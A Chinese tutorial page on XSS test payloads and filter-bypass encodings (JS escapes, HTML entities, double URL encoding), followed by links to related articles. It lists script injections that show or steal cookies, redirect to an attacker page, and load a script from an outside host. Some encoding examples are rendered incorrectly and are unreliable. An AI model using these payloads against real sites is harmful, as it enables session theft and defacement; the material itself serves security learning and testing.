Web網(wǎng)絡(luò)安全漏洞分析XSS常用語句及編碼繞過詳解
XSS進階
XSS常用語句及編碼繞過
XSS常用的測試語句
<img src=1 alert(1)> (顯示1) <script>alert("xss")</script> (顯示xss) <script>alert(document.cookie)</script> (顯示cookie) <script>window.location="(你的黑頁地址)";</script> <img src="javascript:alert('XSS')"> <script>alert(document.cookie)</script> <script>alert(document.cookie)</script> "+alert('XSS')+" <script src="http://xss.io/a.js"></script> <div onclick="alert('xss')"> <div onmouseenter="alert('xss')"> "onclick="alert(document.cookie)
常見的XSS的繞過編碼有JS編碼、HTML實體編碼和URL編碼。
JS編碼
JS提供了四種字符編碼的策略,如下所示。
三個八進制數(shù)字,如果個數(shù)不夠,在前面補0,例如“e”的編碼為“\145”。
兩個十六進制數(shù)字,如果個數(shù)不夠,在前面補0,例如“e”的編碼為“\x65”。
四個十六進制數(shù)字,如果個數(shù)不夠,在前面補0,例如“e”的編碼為“\u0065”。
對于一些控制字符,使用特殊的C類型的轉(zhuǎn)移風(fēng)格(例如\n和\r)。
HTML實體編碼
命名實體:以&開頭,以分號結(jié)尾的,例如“<”的編碼是“<”。
字符編碼:十進制、十六進制ASCII碼或Unicode字符編碼,樣式為“&#數(shù)值;”,例如“<”可以編碼為“<”和“<”。
URL編碼
這里的URL編碼,也是兩次URL全編碼的結(jié)果。如果alert被過濾,結(jié)果為%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34。
在使用XXS編碼測試時,需要考慮HTML渲染的順序,特別是針對多種編碼組合時,要選擇合適的編碼方式進行測試。
以上就是Web網(wǎng)絡(luò)安全漏洞分析XSS常用語句及編碼繞過詳解的內(nèi)容,更多關(guān)于Web網(wǎng)絡(luò)安全漏洞的資料請關(guān)注腳本之家其它相關(guān)文章!
相關(guān)文章
DDoS攻擊與CC攻擊網(wǎng)絡(luò)安全的兩大挑戰(zhàn)如何應(yīng)對防御
這篇文章主要為大家介紹了面對DDoS攻擊與CC攻擊網(wǎng)絡(luò)安全的兩大挑戰(zhàn)應(yīng)該如何應(yīng)對,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步2023-10-10突破神奇的Cloudflare防火墻的網(wǎng)絡(luò)安全學(xué)習(xí)
這篇文章主要為大家介紹了突破神奇的Cloudflare防火墻的網(wǎng)絡(luò)安全學(xué)習(xí),有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步,早日升職加薪2022-07-07Web網(wǎng)絡(luò)安全解析cookie注入攻擊原理
這篇文章主要為大家介紹了Web網(wǎng)絡(luò)安全分析cookie注入攻擊原理詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步2021-11-11Web網(wǎng)絡(luò)安全漏洞分析DOM型XSS攻擊原理
這篇文章主要為大家介紹了Web網(wǎng)絡(luò)安全漏洞分析DOM型XSS攻擊的原理詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步,早日升職加薪2021-11-11關(guān)于Web網(wǎng)絡(luò)如何防范XSS攻擊的措施
這篇文章主要介紹了關(guān)于Web網(wǎng)絡(luò)如何防范XSS攻擊的措施,XSS攻擊是一種常見的網(wǎng)絡(luò)安全漏洞,它可以通過注入惡意代碼來攻擊用戶的計算機和瀏覽器,從而竊取用戶的敏感信息或執(zhí)行惡意操作,需要的朋友可以參考下2023-07-07